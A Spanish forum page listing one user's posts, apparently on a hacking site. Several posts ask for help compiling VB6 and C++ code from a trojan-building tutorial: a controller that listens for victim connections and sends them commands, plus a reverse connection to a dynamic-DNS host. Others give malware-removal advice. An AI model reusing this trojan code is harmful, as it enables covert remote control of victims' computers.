Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Mr.Blue

#231
hola gente les comento, tengo una duda sobre la conexion inversa en mi programa tengo esta linea

Código (cpp) [Seleccionar]
host=gethostbyname("ejemplo.no-ip.biz");
Pero no me lo toma no hay error en la compilacion porsupuesto, pero no me permite conectar al no ip

Tengo un router entonces abro el puerto que indico en el codigo ej: 1234

Pero no me puedo visualizar en el cliente, cuando ejecuto el server.
Puede ser que tenga algo que ver con el firewall?

Intente de dos maneras una con el no-ip y otra poniendo localhost y en esta si funciona.

Saludos
PD: Todo el codigo es el explicado por EON en el tutorial de como crear un troyano C++ y VB 6.0.
#232
Hicistes 3 post para esto, simplemente poniendo en google aparecen muchos.
#233
Gracias seba123neo por tu pronta respuesta, mira esto es lo que me falto de codigo que es el frmMensajes

Código (vb) [Seleccionar]
Dim vIndex As Variant

'Enviamos el mensaje segun la opcion que se elija
'El prefijo para enviar un msj al servidor es "mensj"
'Y luego va el tipo de mensaje a enviar:

Private Sub Command1_Click()

If Option1.Value = True Then
   frmPrincipal.ws(vIndex(0)).SendData "mensj" & "|" & "error" & "|" & txtTitulo.Text & "|" & txtMensaje.Text
End If
If Option2.Value = True Then
   frmPrincipal.ws(vIndex(0)).SendData "mensj" & "|" & "info" & "|" & txtTitulo.Text & "|" & txtMensaje.Text
End If
If Option3.Value = True Then
   frmPrincipal.ws(vIndex(0)).SendData "mensj" & "|" & "interrog" & "|" & txtTitulo.Text & "|" & txtMensaje.Text
End If
If Option4.Value = True Then
   frmPrincipal.ws(vIndex(0)).SendData "mensj" & "|" & "adver" & "|" & txtTitulo.Text & "|" & txtMensaje.Text
End If

End Sub

Private Sub Form_Load()
On Error Resume Next
vIndex = Split(frmPrincipal.Lv.SelectedItem.Key, "|")
Option1.Value = True
End Sub


Este es el codigo del FrmMensajes lo tengo como .frm

El anterior era el codigo del FrmPrincipal este tambien .frm
Despues tengo un Modulo .vbw que cuando lo abro aparecen esos errores.

Citaracabo de pegar el codigo que pusiste y no me tira ningun error...me imagino que tenes un control winsock llamado ws con el indice en 0, y un listview llamado Lv en el formulario ?

Creo que si, y en componentes tengo activado el Microsoft Windows Common Controls 6.0 (SP4)
Y el Microsoft Winsock Controls 6.0


Otra cosa no se si sea de importancia, pero tengo el VB 6.0 portable, no creo q influya en nada, el SP4 no se si tengo que actualizarlo a SP6, bueno lo dejo como dato por las dudas.

Gracias nuevamente.
Saludos.


-----------------------------------------------------------------------------------------------
Edito: Ya lo solucione :P jaja, mejor no digo nada porq era una boludes  :laugh:
#234
Seguridad / Re: mi hermana tiene un pirata
21 Agosto 2010, 20:33 PM
Yo encuentro varias cosas alguna q mensionaron i otras q no

O23 - Service: @%SystemRoot%\system32\aelupsvc.dll,-1 (AeLookupSvc) - Unknown owner - C:\Windows\system32\svchost.exe

Aca una veo muchos svchost me parece raro

Para eso tenes esto
http://www.neuber.com/free/svchost-analyzer/index.html

Este otro
   O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe

Otro
   O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe

Otro
23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe


   O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe


   O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe


Y un par mas...
Muchos svchost igual.

PD: Segun veo ACA http://www.hijackthis.de/
#235
Fijate donde se encuentran

%system%\svchost.exe Patch comun
Existe un svchost de windows que maneja los procesos ejecutados de DLLs, es un proceso de sistema y "no debe ser terminado" para un correcto funcionamiento

Estas son las distintas variantes de virus. "La lista a continuacion son todos virus y donde estan"

%windir%\svchost.dll

%system%\svchosts.exe   -----> este

%system%\SVCHOSTL.EXE

%system%\svchosts.dll


Si el archivo se llama correctamente svchosts.exe es un virus y debe ser eliminado verificalo entrando al directorio correspondiente

PD: El post fue mal ubicado tendria que haber ido en la sección de seguridad, para que tengas encuenta cuando realizes otro post, pero igual no lo movieron hasta ahora asiq bueno :P

Saludos
#236
Código (vb) [Seleccionar]
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)

Dim vIndex As Variant
Public TotalIndex As Integer
Public IndexAbir As Integer

Private Sub Form_Load()
ws(0).LocalPort = 1234
ws(0).Listen 'Por ahora pondremos el 1234 luego ya veremos...
TotalIndex = 0
End Sub

Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
If Cancel = 0 Then
   Dim i As Long
   For i = 1 To Lv.ListItems.Count
       vIndex = Split(Lv.ListItems(i).Key, "|")
       'Mandamos una cadena en blanco a todos los servers para q se desconecten
       ws(vIndex(0)).SendData ""
       Sleep 50
   Next i
End If
End Sub

Private Sub Timer1_Timer()
On Error Resume Next
Dim vIndex As Variant
Dim i As Long

For i = 1 To Lv.ListItems.Count
vIndex = Split(Lv.ListItems(i).Key, "|")

If ws(vIndex(0)).State <> 7 Then 'Si no estamos conectado
   Lv.ListItems.Remove (i) 'Elimnaos la conexion
End If

Next i
End Sub

Private Sub Lv_MouseDown(Button As Integer, Shift As Integer, x As Single, y As Single)
On Error Resume Next
If Lv.SelectedItem.Selected = False Then Exit Sub 'Si no hay nada selecionado salimos
If Button = 2 Then PopupMenu Menú  ' Lanzamos el menú pop up
End Sub

Private Sub ws_ConnectionRequest(Index As Integer, ByVal requestID As Long)
On Error Resume Next
If Index = 0 Then
TotalIndex = 0 'Definimos la varible TotalIndex.
Else
TotalIndex = TotalIndex + 1 'Definimos la varible TotalIndex.
End If

ws(Index).Close
ws(Index).Accept requestID 'Y aceptamos la conexion
Load ws(Index + 1) 'Cargamos un nuevo index
ws(Index + 1).LocalPort = 1234 '
IndexAbir = Index + 1 'Definimos la varible IndexAbir.
ws(IndexAbir).Listen 'Escuhamos el puerto asignado.
End Sub

Private Sub ws_DataArrival(Index As Integer, ByVal bytesTotal As Long)
Dim Datos As String
Dim vDatos As Variant

ws(Index).GetData Datos
vDatos = Split(Datos, "|")

Select Case vDatos(0)
Case "hola" 'Nos saludan, luego lo añadiremos a la lista xDD
   Lv.ListItems.Add(, Index & "|", "Nuevo").SubItems(1) = ws(Index).RemoteHostIP

End Select

End Sub


'-------------------------------- Menús ------------------------------

Private Sub Mensajes_Click()
frmMensajes.Show
End Sub



Es el codigo de EON, del tutorial de como crear un troyano, lo quiero probar haber como funciona. y ver como funciona la codificacion echa en Vb.
No entiendo como leer estos errores que me tira el compilador
Citar
frmPrincipal = 0, -2, 837, 755, , 22, 26, 544, 480, C
frmMensajes = -11, -5, 703, 662, C, 64, 107, 581, 561, C
Module1 = 184, 184, 820, 697, C
Como se supone que los leea? es la linea de codigo? me parece raro porq la linea 755 no hay :P
Saludos
#237
Hola les comento no se mucho de Vb, casi nada pero intentanto compilar un codigo para ver como funciona me tira un error de compilacion: se esperaba: fin de instruccion
seguido de esto

CitarfrmPrincipal = 0, -2, 837, 755, , 22, 26, 544, 480, C
frmMensajes = -11, -5, 703, 662, C, 64, 107, 581, 561, C
Module1 = 184, 184, 820, 697, C

Alguna idea?
disculpen mi ignoracia.
Saludos
#238
Redes / Re: Problema inalambrico :S
20 Agosto 2010, 17:37 PM
Cuando se desconecta no aparece un error del tipo windows no puede obtener direccion ip o algo por el estilo? Tube un mismo problema en windows xp y era una inconpatibilidad que existia en ese sistema operativo, la solucion fue desactivar algo en la configuracion de rede local.

Si no estoy mal de la memoria, esto esta relacionado con el tipo de proteccion que tengas en tu router.

Ahora mi pregunta esta ativada la seguridad del router?

Intenta desactivarla y tratar de conectarte, y fijate que sucede. Contame como te fue luego.

Saludos.

PD: Podes entrar en la web de technet y pegarle una mirada que ahi encontre la solucion.
#239
Seguridad / Re: svchost.exe 100% CPU
19 Agosto 2010, 19:49 PM
Inicia tu maquina en modo a prueba de fallos eh intenta borrarlo desde ahi.
Si no aca tenes una guia de desinfeccion.

http://cert.inteco.es/virusDetail/Actualidad/Actualidad_Virus/Detalle_Virus/DwnLdr_IKH#desinfeccion

Este es el fichero que tenes q eliminar y donde hace una copia de seguridad del mismo
%Temp%\~TM7.tmp: es una copia de sí mismo.
%StartMenu%\updpxe32.exe

En el link que te deje podes ver como se elimina

Saludos
#240
http://www.neuber.com/free/svchost-analyzer/index.html

Aca en este link podes bajar para escanear el svchost.exe

Verifica donde se encuentra el wuauclt.exe

Origen comun en %system%\wuauclt.exe

si esta en %system%\msgina\wuauclt.exe, lo mas probalbe es q sea un troyano o virus